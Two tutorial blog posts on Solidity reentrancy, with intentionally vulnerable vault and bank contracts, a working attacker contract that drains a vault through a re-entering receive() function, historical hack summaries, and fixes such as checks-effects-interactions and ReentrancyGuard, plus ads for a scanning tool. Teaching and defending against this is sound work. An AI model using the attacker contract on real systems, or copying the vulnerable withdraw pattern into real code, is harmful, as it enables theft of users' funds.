Anatomy of a DeFi Hack: Reentrancy Deep Dive

Heemin Kim — Thu, 09 Apr 2026 03:57:29 +0000

Reentrancy is the exploit that launched a thousand audits. The DAO hack of 2016 resulted in a $60M loss and a hard fork of Ethereum itself. Yet the pattern still appears in production contracts today.

Let's walk through exactly how a reentrancy attack unfolds.

The Setup: A Vulnerable Vault

contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "Nothing to withdraw");

        // Step 1: send ETH — triggers attacker's receive()
        (bool ok,) = msg.sender.call{value: amount}("");
        require(ok, "Transfer failed");

        // Step 2: update state — too late!
        balances[msg.sender] = 0;
    }
}

The Attacker Contract

contract Attacker {
    VulnerableVault public vault;
    uint256 public count;

    constructor(address _vault) {
        vault = VulnerableVault(_vault);
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw(); // triggers the loop
    }

    receive() external payable {
        if (count < 10 && address(vault).balance >= 1 ether) {
            count++;
            vault.withdraw(); // re-enter before state is updated
        }
    }
}

Attack Flow

Attacker deposits 1 ETH.
Attacker calls withdraw().
Vault sends 1 ETH to attacker — balance is still 1 ETH at this point.
Attacker's receive() fires and calls withdraw() again.
Vault checks balances[attacker] — still 1 ETH — sends another 1 ETH.
Repeat 10 times: attacker walks away with 10 ETH, vault loses 9.

Fixes

Option A: Checks-Effects-Interactions Pattern

Zero the balance before the external call:

function withdraw() external {
    uint256 amount = balances[msg.sender];
    require(amount > 0);
    balances[msg.sender] = 0; // ← effect first
    (bool ok,) = msg.sender.call{value: amount}(""); // ← interaction last
    require(ok);
}

Option B: ReentrancyGuard

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract SafeVault is ReentrancyGuard {
    function withdraw() external nonReentrant {
        // ...
    }
}

Option C: Pull-over-Push

Instead of sending ETH directly, let users claim it:

mapping(address => uint256) public pending;

function claimFunds() external {
    uint256 amount = pending[msg.sender];
    pending[msg.sender] = 0;
    payable(msg.sender).transfer(amount);
}

Cross-Function Reentrancy

Don't forget that reentrancy can occur across multiple functions sharing state:

function transfer(address to, uint256 amount) external {
    balances[msg.sender] -= amount;
    // ← External call in another function can re-enter here
    balances[to] += amount;
}

Always audit functions that modify shared state alongside functions that make external calls.

ContractScan's static analysis engine flags all of these patterns. Upload your contract and check for reentrancy in seconds.

Try ContractScan free — automated Solidity vulnerability scanning powered by Slither, Semgrep, Mythril, and AI.

Reentrancy: From The DAO to Euler Finance

Heemin Kim — Thu, 09 Apr 2026 03:57:25 +0000

Reentrancy: From The DAO to Euler Finance

The single vulnerability class that has drained the most funds in smart contract history: reentrancy. From the 2016 DAO hack (~$60M) to Cream Finance in 2021 ($130M) and Euler Finance in 2023 ($197M), it has accounted for billions of dollars in losses.

What Is Reentrancy?

When contract A makes an external call to contract B, B can call back into A before A's state has been updated — re-executing logic against stale state.

Vulnerable Code

contract VulnerableBank {
    mapping(address => uint256) public balances;

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0);
        // ⚠️ ETH sent before balance update — reentrancy possible
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success);
        balances[msg.sender] = 0; // Too late!
    }
}

The DAO (2016, ~$60M)

function splitDAO(uint _proposalID) returns (bool) {
    if (!msg.sender.call.value(reward)()) throw; // Transfer first
    totalSupply -= balances[msg.sender]; // State update later
    balances[msg.sender] = 0;
}

→ Directly caused the ETH/ETC hard fork

Cream Finance (2021, ~$130M)

The AMP token's ERC1820 callback was used as a cross-contract reentrancy vector. Collateralized AMP was repeatedly borrowed through reentrant calls.

Euler Finance (2023, ~$197M)

donateToReserves() did not validate the health factor, allowing an artificial liquidation state to be created. Combined with a flash loan for the exploit.

Defense 1: CEI Pattern

function withdraw() external {
    uint256 amount = balances[msg.sender];
    require(amount > 0);
    balances[msg.sender] = 0;  // Effects first
    (bool success, ) = msg.sender.call{value: amount}(""); // Interactions last
    require(success);
}

Defense 2: ReentrancyGuard

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract SafeBank is ReentrancyGuard {
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0);
        balances[msg.sender] = 0;
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success);
    }
}

Defense 3: Pull Payment

Instead of pushing ETH directly, let the recipient pull it themselves.

Checklist

[ ] Is state fully updated before any external calls? (CEI)
[ ] Is the nonReentrant modifier applied?
[ ] Have ERC777/ERC1155 callback tokens been reviewed?
[ ] Has cross-contract reentrancy been considered?

Detecting These Issues with ContractScan

Slither + Semgrep + AI triple-layer analysis automatically detects reentrancy patterns.
→ ContractScan Free Scan

Try ContractScan free — automated Solidity vulnerability scanning powered by Slither, Semgrep, Mythril, and AI.

Forem: Heemin Kim

Anatomy of a DeFi Hack: Reentrancy Deep Dive

The Setup: A Vulnerable Vault

The Attacker Contract

Attack Flow

Fixes

Option A: Checks-Effects-Interactions Pattern

Option B: ReentrancyGuard

Option C: Pull-over-Push

Cross-Function Reentrancy

Reentrancy: From The DAO to Euler Finance

Reentrancy: From The DAO to Euler Finance

What Is Reentrancy?

Vulnerable Code

The DAO (2016, ~$60M)

Cream Finance (2021, ~$130M)

Euler Finance (2023, ~$197M)

Defense 1: CEI Pattern

Defense 2: ReentrancyGuard

Defense 3: Pull Payment

Checklist

Detecting These Issues with ContractScan